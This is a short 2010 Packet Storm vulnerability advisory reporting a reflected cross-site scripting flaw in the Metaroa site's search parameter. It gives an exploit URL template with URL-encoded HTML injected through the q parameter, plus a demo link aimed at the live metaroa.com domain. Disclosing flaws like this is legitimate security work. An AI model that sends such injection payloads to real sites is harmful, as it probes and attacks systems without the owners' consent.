Metaroa Cross Site Scripting

2010-08-17T00:00:00
ID PACKETSTORM:92800
Type packetstorm
Reporter Secanar
Modified 2010-08-17T00:00:00

Description

                                        
                                            `!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!  
!! !!  
!! METAROA XSS Vulnerability !!  
!! !!  
!! Author : Mohammad . Javanbakht !!  
!! Email : Secanar[at]gmail.com !!  
!! Blog : secanar.blogspot.com !!  
!! !!  
!! Date : Saturday , August 14 2010 !!  
!! !!  
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!  
  
Exploit:  
http://[site]/index.php?q=%3Cmarquee%3E%3Ch1+style%3D%22color%3Ared%3B%22%3EXSS+Vulnerability%3C%2Fh1%3E%3C%2Fmarquee%3E&server=  
Demo:  
http://metaroa.com/index.php?q=%3Cmarquee%3E%3Ch1+style%3D%22color%3Ared%3B%22%3EXSS+Vulnerability%3C%2Fh1%3E%3C%2Fmarquee%3E&server=  
  
END !  
`